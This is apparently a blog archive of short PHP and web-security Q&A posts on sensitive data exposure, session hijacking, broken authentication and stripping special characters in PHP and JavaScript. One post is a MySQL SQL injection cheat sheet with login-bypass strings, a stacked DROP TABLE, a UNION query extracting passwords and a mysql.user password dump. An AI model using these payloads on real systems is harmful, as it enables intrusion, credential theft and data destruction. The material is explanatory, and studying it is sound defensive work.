Showing posts with label PHP security. Show all posts
Showing posts with label PHP security. Show all posts

Sunday 18 April 2021

What is sensitive data exposure

 

What is sensitive data exposure


Question: What is sensitive data exposure?
Sensitive data exposure happen when an application OR company exposes users's personal data that might be result of no-encryption, weak encryption, software flaws or upload data to public by mistake.


Question: Example of Attack Scenarios?
  1. Someone upload the company data in Facebook/twitter etc by mistake
  2. Transfer of data through HTTP/FTP/SMTP without encryption
  3. Storing the credit card numbers, health records, personal information (email/phone) storing in database without encryption
  4. Encrypting the data with weak cryptographic algorithms or default algorithms
  5. Reuse of cryptographic algorithms OR hash
  6. Is encryption not enforced, e.g. are any user agent (browser) security directives or headers missing
  7. User agent (e.g. app, mail client) not verifying the certificate when received request.

Question: How to Prevent sensitive data exposure?
  1. Identify which data is sensitive according to privacy laws, regulatory requirements, or business needs
  2. Apply controls as per the classification.
  3. Don’t store sensitive data unnecessarily
  4. Make sure to encrypt all sensitive data at rest.
  5. Ensure up-to-date and strong standard algorithms, protocols, and keys are in place; use proper key management.
  6. Encrypt all data in transit with secure protocols such as TLS
  7. Disable caching for response that contain sensitive data
  8. Store passwords using strong adaptive and salted hashing functions.
  9. Verify independently the effectiveness of configuration and settings


Question: Give few popular data breach in history?
  1. Sony PlayStation Network: 77 million records compromised in 2010
  2. Sony Online Entertainment: 24.6 million records compromised in 2011
  3. Evernote: 50 million records compromised in 2013
  4. Living Social: 50 million records compromised in 2013
  5. Target: 70 million records compromised in 2013
  6. eBay: 145 million records compromised in 2014
  7. Home Depot: 56 million records compromised in 2014
  8. JP Morgan Chase: 76 million records compromised in 2014
  9. Anthem: 80 million records compromised in 2015
  10. Yahoo: One billion records compromised in 2016
  11. Deep Root Analytics: 198 million voter records in 2017


Saturday 17 April 2021

Root Causes of Session Hijacking and Session Fixation and Broken Authentication

Root Causes of Session Hijacking and Session Fixation and Broken Authentication
Question: What is Session Hijacking?
Session hijacking is an attack where a user session is taken over by an attacker.


Question: What are the Root Causes of Session Hijacking?
  1. Guessable session ID
  2. Absence of detection mechanism for “repeated guessing trial” either with brute-force or systematic methods.
  3. Weak cryptography algorithm
  4. Unable to detect repeated guessing trials while there is a mechanism in place
  5. Insecure session handling methods
  6. Limitation of HTTP: the statelessness of the protocol or lack of any inherent or integrated state management mechanism



Question: What is Session Fixation?
Session Fixation is an attack that permits an attacker to hijack a valid user session.

Question: What are the Root Causes of Session Fixation?
  1. Permissive Server: a server that accepts client generated session ID
  2. Session management type in use
  3. Reuse of session identifiers



Question: What is Broken Authentication?
Attacker get authenticated when he attack on Session Data and get success.

Question: What are the Root Causes of Broken Authentication?
  1. Lack of metrics: absence of well-developed metrics
  2. Lack of security knowledge among programmers to apply information and communication security mechanisms to their solutions
  3. Wrong decisions or compromises
  4. Use of self-developed modules instead of well tested and thoroughly analyzed modules for security services such as authentication
  5. Storing user credentials with other application data.
  6. Guessing Attempts: allowing repeated guessing attempts
  7. Lack of security awareness among users.




MySQL - SQL Injection Cheat Sheet

 

MySQL - SQL Injection Cheat Sheet


Question: What is an SQL Injection Cheat Sheet?
An SQL injection cheat sheet is a resource in which you can find
detailed technical information about the many different variants of the SQL Injection vulnerability.


Question: Give few example SQL Injection Cheat Sheet?
#1 - Add comment in between Query which leads to comments out rest of the query.
Normal Query
SELECT * FROM members WHERE email = 'adminuser' AND password = 'password'; 

tempered Query
SELECT * FROM members WHERE email = 'adminuser'-- AND password = 'password'; 

(In this query will check for username only)


#2 Add comment between some part of query
SELECT id,/* comment here*/ email FROM members WHERE 1 


#3 SQL Injection Attack deleting table
SELECT id email FROM members WHERE email="arun@example.com" ; drop table users


#4 Union Injections - try to get another table data
SELECT id email FROM members WHERE email="arun@example.com" union select email,password from members


#5 Bypassing Login Screens - Un-Authentication login with modify in sql through injection
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--


#6 Get All mysql users with password
SELECT User,Password FROM mysql.user;


#7 Get MySQL version
SELECT @@version


#8 Get all MySQL tables
SELECT * FROM information_schema.tables

#9 Sleep Query
SELECT 10,sleep(100)

Saturday 21 December 2019

What are special characters? and how to remove special characters?

What are special characters? and how to remove special characters?

Question: What are special characters?
Special characters are selected punctuation characters present on standard US keyboard.


Question: Provide list of special characters?
Character Name
Space
 ! Exclamation
" Double quote
# Number sign (hash)
$ Dollar sign
 % Percent
& Ampersand
' Single quote
( Left parenthesis
) Right parenthesis
* Asterisk
+ Plus
, Comma
- Minus
. Full stop
/ Slash
 : Colon
 ; Semicolon
< Less than
= Equal sign
> Greater than
 ? Question mark
@ At sign
[ Left bracket
\ Backslash
] Right bracket
^ Caret
_ Underscore
` Grave accent (backtick)
{ Left brace
| Vertical bar
} Right brace
~ Tilde



Question: How to remove special characters from string including space?
$string='test !@#ing';
echo preg_replace('/[^A-Za-z0-9\-]/', '', $string);



Question: How to remove special characters from string except space?
$string='test !@#ing';
echo preg_replace('/[^A-Za-z0-9\-\s]/', '', $string);



Question: How to replace special characters with hyphen?
$string='test !@#ing';
echo preg_replace('/[^A-Za-z0-9\-\s]/', '-', $string);



Question: How to replace multiple hyphen with single hyphen?
$string='test-----ing';
echo preg_replace('/-+/', '-',$string);



Question: How to remove special characters from array?
$array=array('test !@#ing','sdalkjsad','#$#33');
function cleanData($string){
return preg_replace('/[^A-Za-z0-9\-]/', '', $string);
}
$array = array_map('cleanData',$array);
print_r($array);



Question: How to remove all special characters from javascript?
var stringToReplace='test !@#ing';
stringToReplace=stringToReplace.replace(/[^\w\s]/gi, '')